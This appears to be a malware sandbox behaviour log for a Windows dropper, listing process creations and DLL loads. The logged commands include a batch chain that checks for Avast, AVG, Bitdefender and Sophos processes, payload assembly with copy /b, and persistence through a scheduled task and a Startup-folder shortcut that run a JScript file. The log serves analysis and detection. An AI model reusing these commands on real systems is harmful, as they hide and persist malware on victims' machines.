Source: C:\Users\user\Desktop\OmnqazpM3P.exe	Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000002001\crypted.exe "C:\Users\user\AppData\Local\Temp\1000002001\crypted.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000004001\crypteda.exe "C:\Users\user\AppData\Local\Temp\1000004001\crypteda.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe "C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe "C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000129001\caesium-image-compressor.exe "C:\Users\user\AppData\Local\Temp\1000129001\caesium-image-compressor.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000191001\BitcoinCore.exe "C:\Users\user\AppData\Local\Temp\1000191001\BitcoinCore.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000228001\PureSyncInst.exe "C:\Users\user\AppData\Local\Temp\1000228001\PureSyncInst.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000234001\runtime.exe "C:\Users\user\AppData\Local\Temp\1000234001\runtime.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\1000238002\Amadeus.exe "C:\Users\user\1000238002\Amadeus.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\crypted.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000004001\crypteda.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Users\user\AppData\Roaming\pLAZbVgk7u.exe "C:\Users\user\AppData\Roaming\pLAZbVgk7u.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Users\user\AppData\Roaming\6rxotqIg7H.exe "C:\Users\user\AppData\Roaming\6rxotqIg7H.exe"
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	Process created: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe "C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe"
Source: C:\Users\user\AppData\Local\Temp\1000129001\caesium-image-compressor.exe	Process created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
Source: C:\Users\user\AppData\Local\Temp\1000228001\PureSyncInst.exe	Process created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
Source: C:\Users\user\AppData\Local\Temp\1000234001\runtime.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k move Honda Honda.bat & Honda.bat & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "avastui avgui bdservicehost nswscsvc sophoshealth"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 591950
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "BachelorRayPotentialBeats" Itsa
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Competent + ..\Screw + ..\Whom + ..\Reveal + ..\Provides + ..\Still + ..\Entrepreneurs + ..\Greatest + ..\Corporate + ..\Wireless E
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif Shipment.pif E
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c schtasks.exe /create /tn "Statistics" /tr "wscript //B 'C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.js'" /sc minute /mo 5 /F
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Process created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\GuardTrack.url" & echo URL="C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\GuardTrack.url" & exit
Source: C:\Users\user\1000238002\Amadeus.exe	Process created: C:\Users\user\AppData\Local\Temp\1000262001\385107.exe "C:\Users\user\AppData\Local\Temp\1000262001\385107.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Statistics" /tr "wscript //B 'C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.js'" /sc minute /mo 5 /F
Source: C:\Users\user\AppData\Local\Temp\1000262001\385107.exe	Process created: C:\Users\user\AppData\Local\Temp\7zSC5C3.tmp\Install.exe .\Install.exe

Source: C:\Users\user\Desktop\OmnqazpM3P.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	Section loaded: mstask.dll	Jump to behavior
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	Section loaded: dui70.dll	Jump to behavior
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	Section loaded: duser.dll	Jump to behavior
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	Section loaded: chartv.dll	Jump to behavior
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	Section loaded: atlthunk.dll	Jump to behavior
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	Section loaded: explorerframe.dll	Jump to behavior
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\crypted.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\crypted.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\crypted.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\crypted.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\crypted.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\crypted.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\crypted.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: msvcp140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: esdsip.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000004001\crypteda.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\1000004001\crypteda.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1000004001\crypteda.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000004001\crypteda.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1000004001\crypteda.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1000004001\crypteda.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1000004001\crypteda.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: apphelp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: aclayers.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mpr.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc_os.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: windows.storage.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wldp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: uxtheme.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: propsys.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: profapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: edputil.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: urlmon.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: iertutil.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: srvcli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: netutils.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wintypes.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: appresolver.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: bcp47langs.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: slc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: userenv.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sppc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Roaming\pLAZbVgk7u.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\pLAZbVgk7u.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\pLAZbVgk7u.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\pLAZbVgk7u.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\pLAZbVgk7u.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\pLAZbVgk7u.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\pLAZbVgk7u.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\pLAZbVgk7u.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\pLAZbVgk7u.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\pLAZbVgk7u.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\pLAZbVgk7u.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\pLAZbVgk7u.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\pLAZbVgk7u.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\pLAZbVgk7u.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\pLAZbVgk7u.exe	Section loaded: dwrite.dll
Source: C:\Users\user\AppData\Roaming\pLAZbVgk7u.exe	Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Roaming\6rxotqIg7H.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\6rxotqIg7H.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\6rxotqIg7H.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\6rxotqIg7H.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\6rxotqIg7H.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\6rxotqIg7H.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\6rxotqIg7H.exe	Section loaded: ucrtbase_clr0400.dll
